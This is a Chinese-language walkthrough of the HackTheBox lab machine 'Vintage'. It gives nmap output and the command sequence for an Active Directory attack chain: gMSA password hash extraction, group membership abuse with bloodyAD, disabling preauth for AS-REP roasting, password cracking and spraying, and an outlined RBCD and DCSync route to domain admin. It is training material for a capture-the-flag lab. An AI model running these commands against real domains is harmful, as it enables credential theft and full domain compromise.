HTB打靶记录-Vintage
信息收集nmap -sV -sC -O 10.10.11.45
Nmap scan report for 10.10.11.45
Host is up (2.1s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp opendomain Simple DNS Plus
88/tcp openkerberos-sec?
135/tcpopenmsrpc Microsoft Windows RPC
139/tcpopennetbios-ssn?
389/tcpopenldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcpopenmicrosoft-ds?
464/tcpopenkpasswd5?
593/tcpopenncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcpopentcpwrapped
3268/tcp openldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp opentcpwrapped
5985/tcp openhttp Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port139-TCP:V=7.95%I=7%D=4/7%Time=67F39479%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,5,"\x83\0\0\x01\x8f");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-07T08:43:58
|_start_date: N/A
|_clock-skew: -19m07s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 370.27 seconds题目描述给了一个凭证:P.Rosa:Rosaisbest123
GetTGT
impacket-getTGT 'vintage.htb/P.Rosa:Rosaisbest123' -dc-ip 10.10.11.45
记得要faketime
export KRB5CCNAME=P.Rosa.ccache
ldap收集信息
smb走不通,通过ldap来收集,nxc ldap 10.10.11.45 -d vintage.htb -k --use-kcache --users
Administrator
Guest
krbtgt
M.Rossi
R.Verdi
L.Bianchi
G.Viola
C.Neri
P.Rosa
svc_sql
svc_ldap
svc_ark
C.Neri_adm
L.Bianchi_admldap收集不全。改用smb
nxc smb 10.10.11.45 -d vintage.htb -u P.Rosa -k --use-kcache --rid-brute | grep "SidTypeUser"
Administrator
Guest
krbtgt
DC01$
gMSA01$
FS01$
M.Rossi
R.Verdi
L.Bianchi
G.Viola
C.Neri
P.Rosa
svc_sql
svc_ldap
svc_ark
C.Neri_adm
L.Bianchi_adm常规手法都测试了,一点信息收集不到了,直接bloodhound看有没有突破口
bloodhound
faketime "$(ntpdate -q 10.10.11.45 | grep -oP '\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}')" bloodhound-python -d vintage.htb -u P.Rosa -k -no-pass -ns 10.10.11.45 -c all --zip
FS01属于PRE-WINDOWS 2000 Compatible Access组,可以pre2k打一下试试
https://raw.githubusercontent.com/F12-F12/markdown/main/20250408135912.png
pre2k
pre2k unauth -d vintage.htb -dc-ip 10.10.11.45 -save -inputfile user.txt
https://raw.githubusercontent.com/F12-F12/markdown/main/20250408142821.png
继续查看FS01的域关系网,可以从msDS-ManagedPassword读取GMSA01的密码hash
https://raw.githubusercontent.com/F12-F12/markdown/main/20250408143003.png
GMSA
bloodyAD --host dc01.vintage.htb -d vintage.htb --dc-ip 10.10.11.45 -k get object 'GMSA01$' --attr msDS-ManagedPassword
https://raw.githubusercontent.com/F12-F12/markdown/main/20250408144149.png
获取TGT,impacket-getTGT vintage.htb/'gmsa01$' -hashes :b3a15bbdfb1c53238d4b50ea2c4d1178-dc-ip 10.10.11.45
查看gmsa01的域关系网,可以将gmsa01加入SERVICEMANAGES组
https://raw.githubusercontent.com/F12-F12/markdown/main/20250408144759.png
AddSelf/GerenicWrite
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.10.11.45 -u 'GMSA01$' -kadd groupMember "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB"'GMSA01$'
查看是否添加乐成
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.10.11.45 -u 'GMSA01$' -kget object "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" --attr member
https://raw.githubusercontent.com/F12-F12/markdown/main/20250408145924.png
查看SERVICEMANAGES组的域关系网
https://raw.githubusercontent.com/F12-F12/markdown/main/20250408155327.png
对这三个用户有GerenicAll权限,将这三个用户的预认证关闭,打一个AS-REQ Roasting
bloodyAD --host dc01.vintage.htb -d vintage.htb --dc-ip 10.10.11.45 -k add uac SVC_SQL -f DONT_REQ_PREAUTH
svc_sql用户未启用,启用一下,删除UAC里的ACCOUNTDISABLE就行了
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac svc_sql -f ACCOUNTDISABLE
打AS-REQ Roasting
impacket-GetNPUsers vintage/ -request -format hashcat -usersfile user.txt -outputfile np.txt -dc-ip 10.10.11.45 -dc-host dc01.vintage.htb
爆破svc_sql的密码
john np.txt -w=/usr/share/wordlists/rockyou.txt
拿到密码:???????
用这个密码喷洒一下其他用户
kerbrute passwordspray -d vintage.htb user.txt
打中C.Neri,这里应该winrm能够连上C.Neri,但我这里死活连不上,就说一下后面的攻击思路,C.Neri也属于SERVICEMANAGES组,以是可以通过svc_sql打一个RBCD,我们要挑选高权限的用户来伪造,发现L.Bianchi_adm对域控有DCSync权限,那么就可以通过RBCD来获取L.Bianchi_adm的TGT,然后打域控的DCSync获取域管理员的NTLM Hash
https://raw.githubusercontent.com/F12-F12/markdown/main/20250408161039.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]